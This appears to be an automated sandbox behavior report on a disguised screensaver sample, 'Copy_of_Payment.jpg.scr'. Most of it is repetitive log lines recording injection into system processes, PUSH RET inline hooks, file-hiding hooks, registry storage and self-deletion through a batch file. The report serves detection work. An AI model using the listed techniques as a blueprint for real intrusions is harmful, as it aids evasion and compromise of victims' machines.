Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_00412837 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Stores large binary data to the registry

Show sources

Source: C:\Windows\explorer.exe

Key value created or modified: HKEY_USERS\Software\Microsoft\Zuomg Avzu

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Program Files\Windows Mail\WinMail.exe

File created: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox\0B4F5A6C-00000001.eml:OECustomProperty

Deletes itself after installation

Show sources

Source: C:\Windows\System32\cmd.exe

File deleted: c:\copy_of_payment.jpg.scr

Drops batch files with force delete cmd (self deletion)

Show sources

Source: C:\Copy_of_Payment.jpg.scr

File created: C:\Users\admin\AppData\Local\Temp\tmpcdb5e370.bat

Hooks files or directories query functions (used to hide files and directories)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: GetFileAttributesExW

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: WS2_32.dll function: closesocket new code: 0x68 0x8D 0xDF 0xFB 0xBF 0xF9

Overwrites Windows DLL code with PUSH RET codes

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Memory written: PID: 3328 base: 76887673 value: 68 80 BB 41 00 C3
Source: C:\Copy_of_Payment.jpg.scr	Memory written: PID: 3328 base: 76874296 value: 68 F0 BB 41 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76887673 value: 68 80 BB 41 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76874296 value: 68 F0 BB 41 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 772D57B8 value: 68 26 B8 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 772F22AE value: 68 4B B9 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 7704BC9A value: 68 73 BB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 7703318E value: 68 B4 BB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76762642 value: 68 1A BC 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 7672C532 value: 68 31 BC 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 7089441D value: 68 48 BC 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 70872EF2 value: 68 6F BC 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B38760 value: 68 6B 12 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B88740 value: 68 AF 12 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B3B4D0 value: 68 F3 12 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B82AF0 value: 68 48 13 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B73DB0 value: 68 9D 13 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76BFC790 value: 68 3A 14 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B2B470 value: 68 D7 14 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76BFC6D0 value: 68 22 15 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B33FA0 value: 68 6D 15 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B44FB0 value: 68 DA 15 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B60E10 value: 68 08 16 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B88470 value: 68 87 16 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B53290 value: 68 E1 16 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76B3B010 value: 68 0D 17 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76873918 value: 68 DF BF 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76876F01 value: 68 17 C0 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76874406 value: 68 38 C0 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757A5C39 value: 68 4B 35 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757A476B value: 68 9B 35 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B507D value: 68 B9 35 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757ABB1C value: 68 FF 35 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D5BC1 value: 68 45 36 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757C71E4 value: 68 8B 36 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D152B value: 68 D1 36 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D25B7 value: 68 1A 37 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D150A value: 68 63 37 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D25DB value: 68 A9 37 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B1B3C value: 68 EF 37 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D2BD3 value: 68 38 38 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757AED4A value: 68 BD 38 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757ABC6A value: 68 0A 39 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B0162 value: 68 57 39 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757A6293 value: 68 A9 39 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B5D14 value: 68 FA F9 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B5D42 value: 68 6A FA 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B2D57 value: 68 AA FA 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B544C value: 68 05 FB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B4AB7 value: 68 44 FB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B5421 value: 68 83 FB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757AA575 value: 68 C3 FB 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D1C07 value: 68 56 FC 3C 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D6703 value: 68 B4 7D 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757AA4B3 value: 68 E6 7D 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757EC1B0 value: 68 2D 7E 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D6932 value: 68 6A 7E 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757D69F2 value: 68 C4 7E 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757A9DC7 value: 68 14 7F 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757BCDE8 value: 68 B3 7F 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B1899 value: 68 DB 7F 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B634A value: 68 03 80 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B19A5 value: 68 2E 80 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757B64C7 value: 68 FF 81 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 757C2BA7 value: 68 AE 83 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 753326E6 value: 68 A7 C2 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76887673 value: 68 80 BB 3D 00 C3
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Memory written: PID: 3480 base: 76874296 value: 68 F0 BB 3D 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 772D57B8 value: 68 26 B8 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 772F22AE value: 68 4B B9 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 7704BC9A value: 68 73 BB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 7703318E value: 68 B4 BB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76762642 value: 68 1A BC 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 7672C532 value: 68 31 BC 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 7089441D value: 68 48 BC 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 70872EF2 value: 68 6F BC 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B38760 value: 68 6B 12 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B88740 value: 68 AF 12 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B3B4D0 value: 68 F3 12 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B82AF0 value: 68 48 13 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B73DB0 value: 68 9D 13 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76BFC790 value: 68 3A 14 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B2B470 value: 68 D7 14 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76BFC6D0 value: 68 22 15 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B33FA0 value: 68 6D 15 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B44FB0 value: 68 DA 15 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B60E10 value: 68 08 16 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B88470 value: 68 87 16 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B53290 value: 68 E1 16 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76B3B010 value: 68 0D 17 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76873918 value: 68 DF BF 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76876F01 value: 68 17 C0 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76874406 value: 68 38 C0 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757A5C39 value: 68 4B 35 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757A476B value: 68 9B 35 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B507D value: 68 B9 35 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757ABB1C value: 68 FF 35 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D5BC1 value: 68 45 36 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757C71E4 value: 68 8B 36 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D152B value: 68 D1 36 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D25B7 value: 68 1A 37 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D150A value: 68 63 37 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D25DB value: 68 A9 37 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B1B3C value: 68 EF 37 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D2BD3 value: 68 38 38 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757AED4A value: 68 BD 38 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757ABC6A value: 68 0A 39 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B0162 value: 68 57 39 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757A6293 value: 68 A9 39 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B5D14 value: 68 FA F9 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B5D42 value: 68 6A FA 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B2D57 value: 68 AA FA 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B544C value: 68 05 FB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B4AB7 value: 68 44 FB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B5421 value: 68 83 FB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757AA575 value: 68 C3 FB 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D1C07 value: 68 56 FC 21 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D6703 value: 68 B4 7D 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757AA4B3 value: 68 E6 7D 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757EC1B0 value: 68 2D 7E 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D6932 value: 68 6A 7E 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757D69F2 value: 68 C4 7E 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757A9DC7 value: 68 14 7F 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757BCDE8 value: 68 B3 7F 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B1899 value: 68 DB 7F 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B634A value: 68 03 80 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B19A5 value: 68 2E 80 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757B64C7 value: 68 FF 81 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 757C2BA7 value: 68 AE 83 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 753326E6 value: 68 A7 C2 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76887673 value: 68 80 BB 22 00 C3
Source: C:\Windows\System32\dwm.exe	Memory written: PID: 1216 base: 76874296 value: 68 F0 BB 22 00 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 772D57B8 value: 68 26 B8 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 772F22AE value: 68 4B B9 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 7704BC9A value: 68 73 BB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 7703318E value: 68 B4 BB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76762642 value: 68 1A BC 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 7672C532 value: 68 31 BC 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 7089441D value: 68 48 BC 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 70872EF2 value: 68 6F BC 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B38760 value: 68 6B 12 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B88740 value: 68 AF 12 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B3B4D0 value: 68 F3 12 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B82AF0 value: 68 48 13 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B73DB0 value: 68 9D 13 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76BFC790 value: 68 3A 14 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B2B470 value: 68 D7 14 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76BFC6D0 value: 68 22 15 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B33FA0 value: 68 6D 15 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B44FB0 value: 68 DA 15 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B60E10 value: 68 08 16 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B88470 value: 68 87 16 86 04 C3
